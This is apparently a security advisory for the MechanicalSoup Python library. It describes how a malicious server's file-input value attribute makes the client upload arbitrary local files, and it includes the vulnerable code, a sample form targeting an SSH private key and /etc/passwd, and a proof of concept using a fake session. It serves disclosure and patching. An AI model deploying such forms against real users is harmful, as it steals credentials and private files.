Summary
A malicious web server can read arbitrary files on the client by using an <input type="file" ...> element inside an HTML form.
Details
This affects the extremely common pattern of form submission:
b = mechanicalsoup.StatefulBrowser()
b.select_form(...)
b.submit_selected()
The problem is with the code in browser.Browser.get_request_kwargs:
if tag.get("type", "").lower() == "file" and multipart:
filepath = value
if filepath != "" and isinstance(filepath, str):
content = open(filepath, "rb")
else:
content = ""
filename = os.path.basename(filepath)
# If value is the empty string, we still pass it
# for consistency with browsers (see
# https://github.com/MechanicalSoup/MechanicalSoup/issues/250).
files[name] = (filename, content)
The file path is taken from the bs4 tag "value" attribute. However, this path will default to whatever the server sends. So if a malicious web server were to send something like:
<html><body>
<form method="post" enctype="multipart/form-data">
<input type="text" name="greeting" value="hello" />
<input type="file" name="evil" value="/home/user/.ssh/id_rsa" />
</form>
</body></html>
then upon .submit_selected() the mechanicalsoup browser will happily send over the contents of your SSH private key.
PoC
import attr
import mechanicalsoup
import requests
class NevermindError(Exception):
    """Raised by ``FakeSession.request`` to abort before anything is sent."""
@attr.s
class FakeSession:
    """Session stand-in that prints a request instead of sending it.

    Wraps another session object and exposes that object's ``headers``;
    ``request`` prints the arguments it was called with and then raises
    ``NevermindError``.
    """

    # Wrapped session object; only its ``headers`` attribute is read here.
    session = attr.ib()
    headers = property(lambda self: self.session.headers)

    def request(self, *args, **kwargs):
        """Print the would-be request, then raise ``NevermindError``."""
        print("requested", args, kwargs)
        raise NevermindError  # don't actually send request
def demonstrate(inputs=None):
    """Submit the crafted multipart form through a ``FakeSession``.

    The request that would have been sent is printed by
    ``FakeSession.request``; nothing goes over the network.

    Args:
        inputs: Optional value handed to ``b.form.set_input`` before the
            form is submitted. When ``None``, the form is submitted with
            the values that came from the page itself.
    """
    b = mechanicalsoup.StatefulBrowser(FakeSession(requests.Session()))
    # The "evil" file input carries a page-supplied path in its value attribute.
    b.open_fake_page("""\
<html><body>
<form method="post" enctype="multipart/form-data">
<input type="text" name="greeting" value="hello" />
<input type="file" name="evil" value="/etc/passwd" />
<input type="file" name="second" />
</form>
</body></html>
""", url="http://127.0.0.1:9/")
    b.select_form()
    if inputs is not None:
        b.form.set_input(inputs)
    try:
        b.submit_selected()
    except NevermindError:
        # Expected: FakeSession.request aborts right after printing.
        pass
# %%
# unpatched
demonstrate()
# OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('passwd', <_io.BufferedReader name='/etc/passwd'>), 'second': ('', '')}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hello')]}
# %%
# with the patch, this now works. users MUST open the file manually and
# use browser.set_input() using the file object.
# Both values are open file objects (not path strings), matching the OUTPUT
# below; the ``with`` block closes them once the demonstration returns.
with open("/etc/hostname", "rb") as evil, open("/dev/null", "rb") as second:
    demonstrate({"greeting": "hiya", "evil": evil, "second": second})
# OUTPUT: requested () {'method': 'post', 'url': 'http://127.0.0.1:9/', 'files': {'evil': ('hostname', <_io.BufferedReader name='/etc/hostname'>), 'second': ('null', <_io.BufferedReader name='/dev/null'>)}, 'headers': {'Referer': 'http://127.0.0.1:9/'}, 'data': [('greeting', 'hiya')]}
# %%
# with the patch, this raises a ValueError with a helpful string
demonstrate({"evil": "/etc/hostname"})
# %%
# with the patch, we silently send no file if a malicious server tries the attack:
demonstrate()